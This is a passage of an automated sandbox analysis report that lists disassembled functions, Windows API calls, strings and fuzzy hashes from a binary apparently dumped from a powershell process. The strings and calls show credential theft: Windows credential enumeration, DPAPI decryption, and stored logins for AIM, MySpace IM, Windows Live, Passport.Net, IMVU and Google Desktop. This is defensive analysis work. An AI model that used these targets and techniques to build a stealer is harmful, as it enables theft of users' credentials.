        • Instruction Fuzzy Hash: 5F11FAB5900218EFCB00DFA9D984AEEBBF8EB49314B10406AE905E7200D779DE45CB64
        Function 00408C31 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 37COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 00408C55
        • GetPrivateProfileStringA.KERNEL32(0041E308,0000000A,00417C88,?,00001000,0041E200), ref: 00408C77
        • _mbscpy.MSVCRT ref: 00408C91
        Strings
        • <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>, xrefs: 00408C3E
        • ?@, xrefs: 00408C31
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: PrivateProfileString_mbscpymemset
        • String ID: <html><head>%s<title>%s</title></head><body>%s <h3>%s</h3>$?@
        • API String ID: 408644273-2377969721
        • Opcode ID: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
        • Instruction ID: 2fc49bb05c8bae64ff8dc8c223d61166255d3b04a08aec8dce2eb6f2e2500c43
        • Opcode Fuzzy Hash: eaa32ef34ef00f9ac7c7a4cfa2a550b3bebd30948c3fa105c0e2286ae863700b
        • Instruction Fuzzy Hash: BCF0E0725451587AEB139B54EC05FCA7BBC9B4C706F1040E6B749F6080D5F89AC087AC
        Function 00406830 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 29windowCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ErrorLastMessagesprintf
        • String ID: Error$Error %d: %s
        • API String ID: 1670431679-1552265934
        • Opcode ID: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
        • Instruction ID: 390cea375f2136b4ea19b9d86a6fd2b83de258ebf73c3752b6ef921ad7f75954
        • Opcode Fuzzy Hash: 36d162438dc91d31452d3ddaed1ce93054fc777c1344ba0c13efd454db99335c
        • Instruction Fuzzy Hash: 5CF0ECB780020877CB11A754CC05FD676BCBB84704F1540BAB905F2140FF74DA458FA8
        Function 004108FA Relevance: 7.6, APIs: 6, Instructions: 141COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • memset.MSVCRT ref: 00410939
        • memset.MSVCRT ref: 0041097A
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$AddressLibraryLoadProc
        • String ID:
        • API String ID: 95357979-0
        • Opcode ID: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
        • Instruction ID: c4421e9d11457ef95cabe1857e087483fdaed0180908bfd30e84e21e9d597d19
        • Opcode Fuzzy Hash: 3302643975eb3434f4358ab3f025d73aba831524dacbebe51815e8c7a7d14f38
        • Instruction Fuzzy Hash: 6F5139B1C1021DAADF10DF95CD819EEB7BCBF18348F4001AAE605B2251E7789B84CB64
        Function 0040C929 Relevance: 7.6, APIs: 3, Strings: 2, Instructions: 67COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpy
        • String ID: @$@
        • API String ID: 3510742995-149943524
        • Opcode ID: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
        • Instruction ID: 666a53640e029d8b41511af47e133ff9607f2a84e66000161f6e85dafd6cdb1f
        • Opcode Fuzzy Hash: 77fc6db62da11d4799c937781f1bf202b3f83c4704148cc1087516cdf216477c
        • Instruction Fuzzy Hash: 7C115BF2A00709ABCB248F25ECC0DAA77A8EB50344B00033FFD0696291E634DE49C6D9
        Function 00410B95 Relevance: 7.6, APIs: 4, Strings: 1, Instructions: 62stringCOMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memsetstrlen$_mbscat_mbscpy
        • String ID: MySpace\IM\users.txt
        • API String ID: 779718277-1720829597
        • Opcode ID: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
        • Instruction ID: 202a42f0f95dfe566303623c375a0ffeb092d6a880f5aac0c7a4f490a513d9c5
        • Opcode Fuzzy Hash: 3e02ad04ea574821ad089c52dbc2ff5089a47234be35b4f74d739cd638fffc46
        • Instruction Fuzzy Hash: 3511CA7390411C6AD710EA51EC85EDB777C9F61305F1404FBE549E2042EEB89FC88BA5
        Function 0040A455 Relevance: 7.6, APIs: 2, Strings: 3, Instructions: 57COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
        • memset.MSVCRT ref: 0040A48B
          • Part of subcall function 0041244B: memcpy.MSVCRT ref: 004124B9
          • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
          • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
        • sprintf.MSVCRT ref: 0040A4D0
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: FileWrite_mbscpy_strlwrmemcpymemsetsprintfstrlen
        • String ID: <%s>%s</%s>$</item>$<item>
        • API String ID: 3337535707-2769808009
        • Opcode ID: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
        • Instruction ID: 35c3a08c9f4b1e8506f5bd30b0a1229d9af700aff423b6f7980a7f41b92f6d4d
        • Opcode Fuzzy Hash: 3c2db06bff03dcf5fd4fdc9aafb8c3b6a106532d81ea05e082948edd07be60db
        • Instruction Fuzzy Hash: E811E731500616BFD711AF15CC42E9ABB68FF0831CF10402AF409665A1EB76B974CB88
        Function 0040B1EC Relevance: 7.6, APIs: 5, Instructions: 57windowCOMMON
        Download Yara Rule
        APIs
        • SendMessageA.USER32(?,0000000B,00000000,00000000), ref: 0040B233
          • Part of subcall function 0040671B: LoadCursorA.USER32(00000000,00007F02), ref: 00406722
          • Part of subcall function 0040671B: SetCursor.USER32(00000000), ref: 00406729
        • SendMessageA.USER32(?,00001009,00000000,00000000), ref: 0040B256
          • Part of subcall function 004028E7: GetModuleHandleA.KERNEL32(00000000), ref: 00402902
          • Part of subcall function 004028E7: GetProcAddress.KERNEL32(00000000,00000000), ref: 00402924
          • Part of subcall function 004028E7: FreeLibrary.KERNEL32(00000000), ref: 00402934
        • SetCursor.USER32(?,?,0040C35B), ref: 0040B286
        • SetFocus.USER32(?,?,?,0040C35B), ref: 0040B298
        • SendMessageA.USER32(?,0000000B,00000001,00000000), ref: 0040B2AF
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CursorMessageSend$AddressFocusFreeHandleLibraryLoadModuleProc
        • String ID:
        • API String ID: 1022157474-0
        • Opcode ID: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
        • Instruction ID: acf4f1a7ad8cb56491b263665e164ee1eacf8da490df75951db8ca09a257b5c1
        • Opcode Fuzzy Hash: b84fe70da1aaf1055744e1b632632b9f496727907b48f7315893cd4c83107089
        • Instruction Fuzzy Hash: 5C111235200204AFDB16AF55CC85FD537ADFF49708F0A40B9FD099F2A2CBB569108B68
        Function 00408A69 Relevance: 7.5, APIs: 5, Instructions: 49COMMON
        Download Yara Rule
        APIs
        • GetParent.USER32(?), ref: 00408A7B
        • GetWindowRect.USER32(?,?), ref: 00408A88
        • GetClientRect.USER32(00000000,?), ref: 00408A93
        • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 00408AA3
        • SetWindowPos.USER32(?,00000000,?,00000001,00000000,00000000,00000005), ref: 00408ABF
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Window$Rect$ClientParentPoints
        • String ID:
        • API String ID: 4247780290-0
        • Opcode ID: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
        • Instruction ID: 47fd7c03741454bdc7a166d99d5f54bcb442ad9a41c6e05a353417ffaf8a91e2
        • Opcode Fuzzy Hash: 3aa8e274ce559d31e536c38d989a921174712bd1f9a65828c633d0b3e27811af
        • Instruction Fuzzy Hash: 0F014832901129BBDB11DBA5DC49EFFBFBCEF86750F04802AFD11A2140D77895018BA5
        Function 0040A627 Relevance: 7.5, APIs: 3, Strings: 2, Instructions: 44COMMON
        Download Yara Rule
        APIs
        • memset.MSVCRT ref: 0040A64A
        • memset.MSVCRT ref: 0040A660
          • Part of subcall function 004067EC: strlen.MSVCRT ref: 004067F9
          • Part of subcall function 004067EC: WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,0040A46C,?,<item>), ref: 00406806
          • Part of subcall function 00409DD6: _mbscpy.MSVCRT ref: 00409DDB
          • Part of subcall function 00409DD6: _strlwr.MSVCRT ref: 00409E1E
        • sprintf.MSVCRT ref: 0040A697
        Strings
        • <?xml version="1.0" encoding="ISO-8859-1" ?>, xrefs: 0040A665
        • <%s>, xrefs: 0040A691
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memset$FileWrite_mbscpy_strlwrsprintfstrlen
        • String ID: <%s>$<?xml version="1.0" encoding="ISO-8859-1" ?>
        • API String ID: 3699762281-1998499579
        • Opcode ID: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
        • Instruction ID: 800cbe4d2eb2546f00b8b879064eadffaf4e9ad3efc3a30f3f6e1286e630d524
        • Opcode Fuzzy Hash: ab5707da10e36317461923ea0a964ffd6f4046b5a0df19b15fd79c1ac8c7a337
        • Instruction Fuzzy Hash: 92012B7294021977DB21A715CC46FDA7B6CAF14709F0400BBB50DF3082DB789B848BA4
        Function 00409370 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
        Download Yara Rule
        APIs
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@
        • String ID:
        • API String ID: 613200358-0
        • Opcode ID: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
        • Instruction ID: fe66dba444066183ee9975a3477c76674c14659d363ac613d024ab661048b2ad
        • Opcode Fuzzy Hash: f3ce8d52872a8f30b96e2fbf292860e550b06a588b426c696271bbab4e9a7e1e
        • Instruction Fuzzy Hash: 25F0FF726097015BD7209FAAB5C059BB7E9BB49725B60193FF54DD3682C738BC808A1C
        Function 004093D6 Relevance: 7.5, APIs: 5, Instructions: 41COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040937C
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040938A
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 0040939B
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093B2
          • Part of subcall function 00409370: ??3@YAXPAX@Z.MSVCRT ref: 004093BB
        • ??3@YAXPAX@Z.MSVCRT ref: 004093F1
        • ??3@YAXPAX@Z.MSVCRT ref: 00409404
        • ??3@YAXPAX@Z.MSVCRT ref: 00409417
        • ??3@YAXPAX@Z.MSVCRT ref: 0040942A
        • ??3@YAXPAX@Z.MSVCRT ref: 0040943E
          • Part of subcall function 00407491: ??3@YAXPAX@Z.MSVCRT ref: 00407498
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ??3@
        • String ID:
        • API String ID: 613200358-0
        • Opcode ID: 357df7679b5183844f9cf7c0e0a5eff30521e66585b521188fe12c199d1cf3ea
        • Instruction ID: 09cfe481c9f5149ef6062cf2713671c90beccbfb684cd0f5c8863379cec44e3f
        • Opcode Fuzzy Hash: 357df7679b5183844f9cf7c0e0a5eff30521e66585b521188fe12c199d1cf3ea
        • Instruction Fuzzy Hash: 67F06232D0E53167C9257F26B00158EA7646E46725315426FF8097B3D3CF3C6D8146EE
        Function 00411B27 Relevance: 7.5, APIs: 5, Instructions: 40COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00406B6F: memset.MSVCRT ref: 00406B8F
          • Part of subcall function 00406B6F: GetClassNameA.USER32(?,00000000,000000FF), ref: 00406BA2
          • Part of subcall function 00406B6F: _strcmpi.MSVCRT ref: 00406BB4
        • SetBkMode.GDI32(?,00000001), ref: 00411B4E
        • GetSysColor.USER32(00000005), ref: 00411B56
        • SetBkColor.GDI32(?,00000000), ref: 00411B60
        • SetTextColor.GDI32(?,00C00000), ref: 00411B6E
        • GetSysColorBrush.USER32(00000005), ref: 00411B76
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Color$BrushClassModeNameText_strcmpimemset
        • String ID:
        • API String ID: 2775283111-0
        • Opcode ID: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
        • Instruction ID: b9af807899647846139a12986955ac2cc84645abd360b6802fc8b760439410eb
        • Opcode Fuzzy Hash: 4c6c90dc6369ed9def7ad49a685608b6b97007b198ef546a8f3c4911ca2b9476
        • Instruction Fuzzy Hash: 92F03136104504FBDF112FA5EC09FDE3F25EF44721F10812AFA19951B1DB75A9A09B58
        Function 0040FF88 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 101COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00404109: LoadLibraryA.KERNEL32(advapi32.dll,00000000,0040FFAB,75B4EC10,?,?,?,?,?,?,?,?,?,?,?,0040DB18), ref: 00404116
          • Part of subcall function 00404109: GetProcAddress.KERNEL32(00000000,CredReadW), ref: 0040412F
          • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredFree), ref: 0040413B
          • Part of subcall function 00404109: GetProcAddress.KERNEL32(?,CredEnumerateW), ref: 00404147
          • Part of subcall function 00404C9D: LoadLibraryA.KERNELBASE(crypt32.dll,00000000,00404771,?,?), ref: 00404CAA
          • Part of subcall function 00404C9D: GetProcAddress.KERNEL32(00000000,CryptUnprotectData), ref: 00404CBC
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 0041005B
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000,?,00000000,?,?,?), ref: 00410071
        • LocalFree.KERNEL32(?,?,00000000,?,?,?), ref: 0041007D
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: AddressProc$ByteCharLibraryLoadMultiWide$FreeLocal
        • String ID: Passport.Net\*
        • API String ID: 4171712514-3671122194
        • Opcode ID: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
        • Instruction ID: a8053254f1e515f4d897164d33fe2023de59da6d422685d1f9c73d0263123044
        • Opcode Fuzzy Hash: 4033d74ea8b7e7d1449d062c3a122578251190037a8d9eb515b0a5cc15d38eb4
        • Instruction Fuzzy Hash: 9231F7B1D01129AADB10DF95DC44EDEBBB8FF49750F11406BF610A7250D7789A81CBA8
        Function 00410AC5 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 76COMMON
        Download Yara Rule
        APIs
          • Part of subcall function 004067BA: CreateFileA.KERNELBASE(?,80000000,00000001,00000000,00000003,00000000,00000000,00404233,?), ref: 004067CC
        • GetFileSize.KERNEL32(00000000,00000000,MySpace\IM\users.txt,00000104,00000000,?,?,?,?,00410C45,?,00000000), ref: 00410AE7
          • Part of subcall function 00407A56: ??3@YAXPAX@Z.MSVCRT ref: 00407A5D
          • Part of subcall function 00407A56: ??2@YAPAXI@Z.MSVCRT ref: 00407A6B
          • Part of subcall function 00406ED6: ReadFile.KERNELBASE(?,?,?,00000000,00000000,00000001,?,00404269,00000000,00000000,00000000), ref: 00406EED
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,?,00000000,00000000,?,?,?,?,?,?,?,00410C45), ref: 00410B64
          • Part of subcall function 004108FA: memset.MSVCRT ref: 00410939
        • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,00410C45,?,00000000), ref: 00410B78
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: File$??2@??3@ByteCharCloseCreateHandleMultiReadSizeWidememset
        • String ID: MySpace\IM\users.txt
        • API String ID: 429556018-1720829597
        • Opcode ID: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
        • Instruction ID: 28eca0bbeff0950369e7ada1521615d79b3b69832f60dc8e7f5924118cda3e2e
        • Opcode Fuzzy Hash: 9ecfc60a0865bdac6d3c577decf5946b40f4711ca6fbc71636231e6ee1035587
        • Instruction Fuzzy Hash: 21217171C0424AEFCF00DFA9CC458DEBB74EF41328B158166E924772A1C634AA45CBA5
        Function 00402834 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 00402873
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • RegCloseKey.ADVAPI32(?), ref: 004028C2
        • RegCloseKey.ADVAPI32(?), ref: 004028DF
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Close$EnumOpenmemset
        • String ID: Software\AIM\AIMPRO
        • API String ID: 2255314230-3527110354
        • Opcode ID: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
        • Instruction ID: 67585355273d4b01a1114a6cd89f6c97ebf6c1cbf8b7b4d496df69d3c229a794
        • Opcode Fuzzy Hash: dded90e1ec05a9ac15428789d49d31d8fd58391a594f54d73697f6d07bfadf32
        • Instruction Fuzzy Hash: 48115E76904118BADF21A792ED06FDE7B7CDF54304F0000B6AA44E1091EB756FD5DA64
        Function 00407BC6 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00411D68: RegOpenKeyExA.KERNELBASE(80000001,80000001,00000000,00020019,80000001,00402850,80000001,Software\AIM\AIMPRO,?), ref: 00411D7B
        • memset.MSVCRT ref: 00407C05
          • Part of subcall function 00411DEE: RegEnumKeyExA.ADVAPI32(?,000000FF,000000FF,?,00000000,00000000,00000000,000000FF,000000FF), ref: 00411E11
        • RegCloseKey.ADVAPI32(?), ref: 00407C54
        • RegCloseKey.ADVAPI32(?), ref: 00407C71
        Strings
        • Software\Google\Google Desktop\Mailboxes, xrefs: 00407BD5
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: Close$EnumOpenmemset
        • String ID: Software\Google\Google Desktop\Mailboxes
        • API String ID: 2255314230-2212045309
        • Opcode ID: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
        • Instruction ID: a9c93927ac610b6ef28ec82afd47bdb8c9c4627465144405bf34b6a811739c17
        • Opcode Fuzzy Hash: b50ec71faf233748746677e360152f00ca846f408f6190e6d0fa9129bc25d888
        • Instruction Fuzzy Hash: E9115EB6D04118BADF21AB91EC41FDEBB7CDF55304F0041B6BA04E1051E7756B94CEA9
        Function 00403BF0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: _mbscmp_mbsicmpmemset
        • String ID: :@
        • API String ID: 1080945674-3074689909
        • Opcode ID: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
        • Instruction ID: 05d51c46cf4b3144aa59074ae4edee5e5c3f47845a6acae635e5c8c721b5e64e
        • Opcode Fuzzy Hash: fc6b87c77e97942f29d542673130d1b31dda64e9daeb6a0660619c666916343b
        • Instruction Fuzzy Hash: 9911867250C3459AD720EEA5E809BDB77DCEB84315F004D3FF594E3181E7749609879A
        Function 0041051F Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 57COMMON
        Download Yara Rule
        APIs
        • _wcsnicmp.MSVCRT ref: 0041053E
          • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD18
          • Part of subcall function 0040FD01: memset.MSVCRT ref: 0040FD21
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410570
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 00410587
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ByteCharMultiWidememset$_wcsnicmp
        • String ID: windowslive:name=
        • API String ID: 947294041-3311407311
        • Opcode ID: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
        • Instruction ID: aaacd06d763df2f40df435721f5dd751edfa9d120b015f6101ff871e9026a9e8
        • Opcode Fuzzy Hash: fd4d89018f6d8f297b5807dfdb0caed421d73eceed85ab27545bd491571ae371
        • Instruction Fuzzy Hash: A80184B6604209BFD710DF59DC84DD77BECEB49364F10462ABA28D72A1D630DD04CBA0
        Function 0040F2E1 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 56COMMON
        Download Yara Rule
        APIs
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F325
        • WideCharToMultiByte.KERNEL32(00000000,00000000,?,000000FF,?,000000FF,00000000,00000000), ref: 0040F339
        • _wcsnicmp.MSVCRT ref: 0040F347
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ByteCharMultiWide$_wcsnicmp
        • String ID: http://www.imvu.com
        • API String ID: 1082246498-3717390816
        • Opcode ID: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
        • Instruction ID: a621eff572e40bce3e368aabcc4a0ad2a08d37bae4b59898fbad6a548f86f146
        • Opcode Fuzzy Hash: d858862f83375720269192bc115d82f05b3495ae824a477da88cd8a016989edf
        • Instruction Fuzzy Hash: CD1152B2544349AED7309E599C84EEB7FACEB89364F10062EB96892191D7305A14C6B2
        Function 00410894 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 31COMMON
        Download Yara Rule
        APIs
        • memcpy.MSVCRT ref: 004108AE
        • memcpy.MSVCRT ref: 004108C0
        • DialogBoxParamA.USER32(0000006B,?,Function_000105A6,00000000), ref: 004108E4
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: memcpy$DialogParam
        • String ID: ;4
        • API String ID: 392721444-4181167889
        • Opcode ID: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
        • Instruction ID: 2aaa1d25541d53f243854b8b99eb4e9492d8e88977a0f1258d463d5600498ee3
        • Opcode Fuzzy Hash: c5f1268ccc674415783c8697f9a32e79e000757815ba7d6e947a1f9e053f7934
        • Instruction Fuzzy Hash: 86F0A771A44730BBF7216F55BC06BC67A91AB08B06F218036F545A51D0C3B925D08FDC
        Function 00406B6F Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 29COMMON
        Download Yara Rule
        APIs
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: ClassName_strcmpimemset
        • String ID: edit
        • API String ID: 275601554-2167791130
        • Opcode ID: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
        • Instruction ID: aca7036e1f85a757735cd09c7bf6aa39e2ce89dfda263754777898d954571a1f
        • Opcode Fuzzy Hash: 1fc934d62d77a70a9e396aa4a7c9eacbfe567db38c0b85652fff254433e2e45d
        • Instruction Fuzzy Hash: 61E09BB3C5012A6ADB11AA64EC05FE5376C9F54705F0001F6B949E2081E5B457C44B94
        Function 00401085 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 26windowCOMMON
        Download Yara Rule
        APIs
          • Part of subcall function 00406A19: memset.MSVCRT ref: 00406A23
          • Part of subcall function 00406A19: _mbscpy.MSVCRT ref: 00406A63
        • CreateFontIndirectA.GDI32(?), ref: 004010AA
        • GetDlgItem.USER32(?,000003EC), ref: 004010BA
        • SendMessageA.USER32(00000000,00000030,?,00000000), ref: 004010C7
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
        Similarity
        • API ID: CreateFontIndirectItemMessageSend_mbscpymemset
        • String ID: MS Sans Serif
        • API String ID: 2650341901-168460110
        • Opcode ID: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
        • Instruction ID: 5c9505941c48c8dd7a2399cb1aaf590a0077e647136f214fd0fe6491ebdd60b9
        • Opcode Fuzzy Hash: e4ca45643e333f1720333046815af32c43876757aaae09a92ca8bc646b2ccae1
        • Instruction Fuzzy Hash: 67E06D71A40604FBCB116BA0EC0AFCABB6CAB44700F108125FA51B60E1D7B0A114CB88
        Function 00412192 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 12libraryloaderCOMMON
        Download Yara Rule
        APIs
        • LoadLibraryA.KERNEL32(shell32.dll,00412251,00000000,00000104), ref: 004121A0
        • GetProcAddress.KERNEL32(00000000,SHGetSpecialFolderPathA), ref: 004121B5
        Strings
        Memory Dump Source
        • Source File: 00000011.00000002.2272649918.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
        Joe Sandbox IDA Plugin
        • Snapshot File: hcaresult_17_2_400000_powershell.jbxd
